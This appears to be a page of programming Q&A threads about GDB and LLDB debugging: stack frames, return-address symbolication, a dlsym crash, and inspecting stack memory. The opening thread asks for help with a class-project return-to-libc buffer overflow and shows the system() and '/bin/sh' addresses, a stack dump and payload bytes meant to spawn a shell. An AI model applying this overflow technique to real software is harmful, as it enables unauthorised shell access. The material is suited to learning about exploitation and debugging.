I am trying to do a buffer overflow for a project. The buffer needs to overflow to /bin/sh. I have found the correct return address, but I do not seem to be successfully getting an overflow.
Program received signal SIGSEGV, Segmentation fault.
0xb7fbc544 in msg (params) at myfile.c:167
167 msg_length = ctx->backend->send_msg_pre(msg, msg_length);
(gdb) backtrace
#0 0xb7fbc544 in msg (params) at myfile.c:167
#1 0xb7fbc869 in my_function(params) at myfile.c:912
#2 0xb7e4c190 in ?? () at ../sysdeps/unix/sysv/linux/system.c:76 from /lib/i386-linux-gnu/libc.so.6
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
To find the /bin/sh I followed this post:
(gdb) print &system
$15 = (<text variable, no debug info> *) 0xb7e4c190 <__libc_system>
(gdb) find &system,+9999999,"/bin/sh"
0xb7f6ca24
warning: Unable to access 16000 bytes of target memory at 0xb7fc292c, halting search.
1 pattern found.
(gdb)
I have found the return address and verified it is correct (if I replace it with a different function it calls that function). The original return address is bolded
0xbffff690: 0x90909090 0x90909090 0x90909090 0xb7e4c190
0xbffff6a0: 0xb7f6ca24 0x0804c050 0x0000004d 0x0804c158
The payload I sent was 0xb7e4c190 0xb7f6ca24 50
This overflow is a bit more tricky than others, because I need to do some padding to it in the front and the back. The way the item I am overflowing works is that it sets 6 bytes, so each set will take up a portion of one address and another.
I think the problem is that I have to overflow the last byte. I matched what it was originally, but that does not seem to work:
payload = payload + ['\x90'] + ['\xc1'] + ['\xe4'] + ['\xb7']
payload = payload + ['\x24'] + ['\xca'] + ['\xf6'] + ['\xb7'] + ['\x50']
Is there something I am missing here? Because the stack does not show the /bin/sh call in the overflow, I feel like that is not correct.
Related
Is it possible to get the current size of the stack in bytes with GDB (at a breakpoint)?
I didn't find anything regarding this on the Internet.
It's unclear whether you are asking "how much stack have my thread consumed so far", or "what is the maximum stack size this thread may consume in the future".
The first question can be trivially answered by using:
# go to the innermost frame
(gdb) down 100000
(gdb) set var $stack = $sp
# go to the outermost frame
(gdb) up 100000
(gdb) print $sp - $stack
To answer the second question, you would need libpthread that is built with debug symbols. If using GLIBC, you can do this:
# Go to frame which is `start_thread`
(gdb) frame 2
#2 0x00007ffff7d7eeae in start_thread (arg=0x7ffff7a4c640) at pthread_create.c:463
463 in pthread_create.c
(gdb) p pd.stackblock
$1 = (void *) 0x7ffff724c000 # low end of stack block
(gdb) p pd.stackblock_size
$1 = 8392704
Here you can see that the entire stack spans [0x7ffff724c000, 0x7ffff7a4d000] region. You can also confirm that $sp is in that region, near the high address end of the stack (which grows from high to low addresses on this system):
(gdb) p $sp
$9 = (void *) 0x7ffff7a4be60
I want to programmatically convert backtrace stack addresses (eg obtained from backtrace_symbols/libunwind) to file:line:column. I'm on OSX but doubt this makes a difference.
All of these give wrong line number (line 11) for the call to fun1():
atos
addr2line
llvm-symbolizer
lldb image lookup --address using lldb's pc addresses in bt
lldb bt itself gives correct file:line:column, (line 7) as shown below.
How do I programmatically get the correct stack address such that, when using atos/addr2line/llvm-symbolizer/image lookup --address, it would resolve to the correct line number? lldb bt is doing it correctly, so there must be a way to do it. Note that if I use backtrace_symbols or libunwind (subtracted from info.dli_saddr after calling dladdr), I'd end up with the same address 0x0000000100000f74 as shown in lldb bt that points to the wrong line number 11
Note: in .lldbinit, if I add settings set frame-format frame start-addr:${line.start-addr}\n it will show the correct address (ie resolve to 0x0000000100000f6f instead of 0x0000000100000f74, which will resolve to the correct line 7). However, how do I programmatically generate start-addr from a c program without calling spawning a call to lldb -p $pid (calling lldb has other issues, eg overhead compared to llvm-symbolizer, and in fact can hang forever even with -batch).
clang -g -o /tmp/z04 test_D20191123T162239.c
test_D20191123T162239.c:
void fun1(){
}
void fun1_aux(){
int a = 0;
fun1(); // line 7
mylabel:
if(1){
a++; // line 11
}
}
int main(int argc, char *argv[]) {
fun1_aux();
return 0;
}
lldb /tmp/z04
(lldb) target create "/tmp/z04"
Current executable set to '/tmp/z04' (x86_64).
(lldb) b fun1
Breakpoint 1: where = z04`fun1 + 4 at test_D20191123T162239.c:2:1, address = 0x0000000100000f54
(lldb) r
Process 7258 launched: '/tmp/z04' (x86_64)
Process 7258 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
frame #0: 0x0000000100000f54 z04 fun1 + 4 at test_D20191123T162239.c:2:1
1 void fun1(){
-> 2 }
3
4 void fun1_aux(){
5 int a = 0;
6
7 fun1();
Target 0: (z04) stopped.
(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
* frame #0: 0x0000000100000f54 z04 fun1 + 4 at test_D20191123T162239.c:2:1
frame #1: 0x0000000100000f74 z04 fun1_aux + 20 at test_D20191123T162239.c:7:3
frame #2: 0x0000000100000fab z04 main(argc=1, argv=0x00007ffeefbfb748) + 27 at test_D20191123T162239.c:16:3
frame #3: 0x00007fff71c182e5 libdyld.dylib start + 1
frame #4: 0x00007fff71c182e5 libdyld.dylib start + 1
(lldb)
(lldb) image lookup --address 0x0000000100000f74
Address: z04[0x0000000100000f74] (z04.__TEXT.__text + 36)
Summary: z04`fun1_aux + 20 at test_D20191123T162239.c:11:8
echo 0x0000000100000f74 | llvm-symbolizer -obj=/tmp/z04
fun1_aux
test_D20191123T162239.c:11:8
atos -o /tmp/z04 0x0000000100000f74
fun1_aux (in z04) (test_D20191123T162239.c:11)
likewise with addr2line
It's easier to understand if you look at the disassembly for fun1_aux -- you'll see a CALLQ instruction to fun1, followed by something like a mov %rax, $rbp-16 or something like that, the first instruction of your a++ line. When you have called fun1, the return address is the instruction that will be executed when fun1 exits, the mov %rax, $rbp-16 or whatever.
This isn't intuitively how most people think of the computer working -- they expect to look at frame 1, fun1_aux, and see the "current pc value" be the CALLQ, because the call is executing. But of course, that's not correct, the call instruction has completed, and the saved pc is going to point to the next instruction.
In cases like this, the next instruction is part of the next source line, so it's a little extra confusing. Even better is if you have a function that calls a "noreturn" function like abort() -- the final instruction in the function will be a CALLQ, and if you look at the return address instruction, it may point to the next function.
So when lldb is symbolicating stack frames above frame #0, it knows to do a symbol lookup with saved_pc - 1 to move the address back into the CALLQ instruction. That's not a valid address, so it should never show you saved_pc - 1, but it should do symbol / file & line lookups based on it.
You can get the same effect for your manual symbolication by doing the same thing. The one caveat is if you have an asynchronous interrupt (_sigtramp on macOS), the frame above _sigtramp should not have its saved pc value decremented. You could be executing the first instruction of a function when the signal is received, and decrementing it would put you in the previous function which would be very confusing.
We're loading a symbol from a shared library via dlsym() under GNU/Linux and obviously get some kind of race condition resulting in a segmentation fault. The backtrace looks something like this:
(gdb) backtrace
#0 do_lookup_x at dl-lookup.c:366
#1 _dl_lookup_symbol_x at dl-lookup.c:829
#2 do_sym at dl-sym.c:168
#3 _dl_sym at dl-sym.c:273
#4 dlsym_doit at dlsym.c:50
#5 _dl_catch_error at dl-error.c:187
#6 _dlerror_run at dlerror.c:163
#7 __dlsym at dlsym.c:70
#8 ... (our code)
My local machine uses glibc-2.23.
I discovered, that the library handle given to __dlsym() in frame #7 is different to the handle passed to _dlerror_run(). It runs wild in the following lines in dlsym.c:
void *
__dlsym (void *handle, const char *name DL_CALLER_DECL)
{
# ifdef SHARED
if (__glibc_unlikely (_dlfcn_hook != NULL))
return _dlfcn_hook->dlsym (handle, name, DL_CALLER);
# endif
struct dlsym_args args;
args.who = DL_CALLER;
args.handle = handle; /* <------------------ this isn't my handle! */
args.name = name;
/* Protect against concurrent loads and unloads. */
__rtld_lock_lock_recursive (GL(dl_load_lock));
void *result = (_dlerror_run (dlsym_doit, &args) ? NULL : args.sym);
__rtld_lock_unlock_recursive (GL(dl_load_lock));
return result;
}
GDB says
(gdb) frame 7
#7 __dlsym at dlsym.c:70
(gdb) p *(struct link_map *)args.handle
$36 = {l_addr= 140736951484536, l_name = 0x7fffe0000078 "\300\215\r\340\377\177", ...}
so this is obviously garbage. The same occurs in the higher frames, e.g. in frame #2:
(gdb) frame 2
#2 do_sym at dl-sym.c:168
(gdb) p handle
$38 = {l_addr= 140736951484536, l_name = 0x7fffe0000078 "\300\215\r\340\377\177", ...}
Unfortunately the parameter handle in frame #7 can't be displayed:
(gdb) p handle
$37 = <optimized out>
but surprisingly in frame #8 and further down in our code the handle was correct:
(gdb) frame 8
#8 ...
(gdb) p *(struct link_map *)libHandle
$38 = {l_addr = 140737160646656, l_name = 0x7fffd8005b60 "/path/to/libfoo.so", ...}
Now my conclusion is, that the variable args must be modified during the execution inside __dlsym() but I can't see where and why.
I have to confess, there's a second aspect to this problem: It only occurs in a multi-threaded environment and only sometimes. But as you can see, there are some counter measures for race conditions in the implementation of __dlsym() since they're calling __rtld_lock_(un)lock_recursive() and the local variable args isn't shared across threads. And curiously enough, the problem still persists, if I make frame #8 mutual exclusive among my threads.
Questions: What are possible sources for the discrepancy in the library handle between frame #8 and frame #7?
Question 2: Does dlopen() yield different values for different threads? Or to put it differently: Is it possible to share the handles returned by dlopen() between different threads.
Update: I thank everybody commenting on this question and trying to answer it despite the lack of almost any viable information to do so. I found the solution of this problem. As foreseen by the commenters, it was totaly unrelated to the stacktraces and other information I provided. Hence, I consider this question as closed and will flag it for deletion. So Long, and Thanks for All the Fish
What are possible sources for the discrepancy in the library handle between frame #8 and frame #7?
The most likely cause is mismatch between ld-linux.so and libdl.so. As stated in this answer, ld-linux and libdl must come from the same build of GLIBC, or bad things will happen.
The mismatch can come from (A) trying to point to a different libc build via LD_LIBRARY_PATH, or (B) by static linking of libdl.a into the program.
The (gdb) info shared should show you which libraries are currently loaded. If you see something other than installed system ld-linux and libdl, then (A) is likely your problem.
For (B), you probably got (and ignored) a linker warning to the effect that your program will require at runtime the same libc version that you used to link it. Contrary to popular belief, fully-static binaries are less portable on Linux, not more.
I'm new to reverse engeneering. I wrote the following C code to help me understand a bit more about stack frames.
#include <stdio.h>
int sum(int a, int b,int c)
{
return(a+b+c);
}
int media(int a, int b,int c)
{
int total;
total = a + b + c;
return (total/3);
}
int main ()
{
int num1,num2,num3;
char keypress[1];
num1 = 5;
num2 = 10;
num3 = 15;
printf ("\nCalling sum function\n");
sum(num1,num2,num3);
printf ("\nWaiting a keypress to call media function\n");
scanf ("%c",keypress);
media(num1,num2,num3);
printf ("\nWaiting a keypress to end\n");
scanf ("%c",keypress);
return(0);
}
As far as I know every time you call a function
a stack frame is created (see: ftp.gnu.org/old-gnu/Manuals/gdb/html_node/gdb_41.html). So, my goal with the above C code is to see, at least, three stack-frames.
1) main function - stack frame
2) sum function - stack frame
3) media function - stack frame
BTW: Those printfs are just to help me 'follow' the program in gdb. =)
So I guess if I compare the output of info frame after the program started with the output of info frame just after sum function is called I would get different output right? I did not got it as you can see:
Temporary breakpoint 1, main () at parastack.c:27
warning: Source file is more recent than executable.
27 num1 = 5;
(gdb) nexti
28 num2 = 10;
(gdb) info frame
Stack level 0, frame at 0x7fffffffdf00:
rip = 0x400605 in main (parastack.c:28); saved rip = 0x7ffff7a3c790
source language c.
Arglist at 0x7fffffffdef0, args:
Locals at 0x7fffffffdef0, Previous frame's sp is 0x7fffffffdf00
Saved registers:
rbp at 0x7fffffffdef0, rip at 0x7fffffffdef8
(gdb) nexti
29 num3 = 15;
(gdb) nexti
31 printf ("\nCalling sum function\n");
(gdb) nexti
0x0000000000400618 31 printf ("\nCalling sum function\n");
(gdb) nexti
Calling sum function
32 sum(num1,num2,num3);
(gdb) info frame
Stack level 0, frame at 0x7fffffffdf00:
rip = 0x40061d in main (parastack.c:32); saved rip = 0x7ffff7a3c790
source language c.
Arglist at 0x7fffffffdef0, args:
Locals at 0x7fffffffdef0, Previous frame's sp is 0x7fffffffdf00
Saved registers:
rbp at 0x7fffffffdef0, rip at 0x7fffffffdef8
(gdb) nexti
0x0000000000400620 32 sum(num1,num2,num3);
(gdb) info frame
Stack level 0, frame at 0x7fffffffdf00:
rip = 0x400620 in main (parastack.c:32); saved rip = 0x7ffff7a3c790
source language c.
Arglist at 0x7fffffffdef0, args:
Locals at 0x7fffffffdef0, Previous frame's sp is 0x7fffffffdf00
Saved registers:
rbp at 0x7fffffffdef0, rip at 0x7fffffffdef8
just after sum function is called
Your problem is that you never actually stopped inside of the sum function. You stopped after you printed that you are about to call it, and then you stepped a few instructions, but you never actually landed inside (it takes a few instructions to prepare arguments, one more to actually call, and few more inside the function to set up the frame).
You should start by setting breakpoints inside sum and media, and doing info frame when these breakpoints are hit. You'll notice that the breakpoint is set a few instructions after the beginning of the function (i.e. after function prolog). The skipped instructions are exactly the ones that set up the new frame.
After you understand how that works, you should progress to using step and next commands.
And after that you can graduate to using disas, stepi and nexti commands.
Based on my interpretation of your prose, your understanding of stack frames is slightly off. You are correct that when a function is called a stack frame is created, however, what you're missing is that when a function returns, the stack frame is popped. The stack is in the same state is was before the function began executing except that the program counter contains the address of the first instruction of the statement immediately following the function that just finished executing. So, you should not expect to see 3 stack frames after the two functions in main execute. You will only see one since you're only one frame deep into main().
As for the gdb session, as #Employed Russian points out, you never actually step into any function when printing the stack frame information.
Thanks for everyone that helped me. Below are the gdb session with shows that the stack-frame changed.
First I recompiled the C code: gcc -ggdb stack.c -o stack.bin
gdb stack.bin
(gdb) break sum
(gdb) start
(gdb) info frame
Stack level 0, frame at 0x7fffffffe1a0:
rip = 0x400653 in main (stack.c:26); saved rip 0x7ffff7a6fead
source language c.
Arglist at 0x7fffffffe190, args:
Locals at 0x7fffffffe190, Previous frame's sp is 0x7fffffffe1a0
Saved registers:
rbp at 0x7fffffffe190, rip at 0x7fffffffe198
(gdb) continue
Continuing.
Calling sum function
Breakpoint 1, sum (a=5, b=10, c=15) at stack.c:6
6 total = a + b + c;
(gdb) info frame
Stack level 0, frame at 0x7fffffffe180:
rip = 0x4005dd in sum (stack.c:6); saved rip 0x400684
called by frame at 0x7fffffffe1a0
source language c.
Arglist at 0x7fffffffe170, args: a=5, b=10, c=15
Locals at 0x7fffffffe170, Previous frame's sp is 0x7fffffffe180
Saved registers:
rbp at 0x7fffffffe170, rip at 0x7fffffffe178
Now I will search/learn more about the information in the output.
I am new to GDB, so I have some questions:
How can I look at content of the stack?
Example: to see content of register, I type info registers. For the stack, what should it be?
How can I see the content of $0x4(%esp)? When I type print /d $0x4(%esp), GDB gives an error.
Platform: Linux and GDB
info frame to show the stack frame info
To read the memory at given addresses you should take a look at x
x/x $esp for hex x/d $esp for signed x/u $esp for unsigned etc. x uses the format syntax, you could also take a look at the current instruction via x/i $eip etc.
Use:
bt - backtrace: show stack functions and args
info frame - show stack start/end/args/locals pointers
x/100x $sp - show stack memory
(gdb) bt
#0 zzz () at zzz.c:96
#1 0xf7d39cba in yyy (arg=arg#entry=0x0) at yyy.c:542
#2 0xf7d3a4f6 in yyyinit () at yyy.c:590
#3 0x0804ac0c in gnninit () at gnn.c:374
#4 main (argc=1, argv=0xffffd5e4) at gnn.c:389
(gdb) info frame
Stack level 0, frame at 0xffeac770:
eip = 0x8049047 in main (goo.c:291); saved eip 0xf7f1fea1
source language c.
Arglist at 0xffeac768, args: argc=1, argv=0xffffd5e4
Locals at 0xffeac768, Previous frame's sp is 0xffeac770
Saved registers:
ebx at 0xffeac75c, ebp at 0xffeac768, esi at 0xffeac760, edi at 0xffeac764, eip at 0xffeac76c
(gdb) x/10x $sp
0xffeac63c: 0xf7d39cba 0xf7d3c0d8 0xf7d3c21b 0x00000001
0xffeac64c: 0xf78d133f 0xffeac6f4 0xf7a14450 0xffeac678
0xffeac65c: 0x00000000 0xf7d3790e
You need to use gdb's memory-display commands. The basic one is x, for examine. There's an example on the linked-to page that uses
gdb> x/4xw $sp
to print "four words (w ) of memory above the stack pointer (here, $sp) in hexadecimal (x)". The quotation is slightly paraphrased.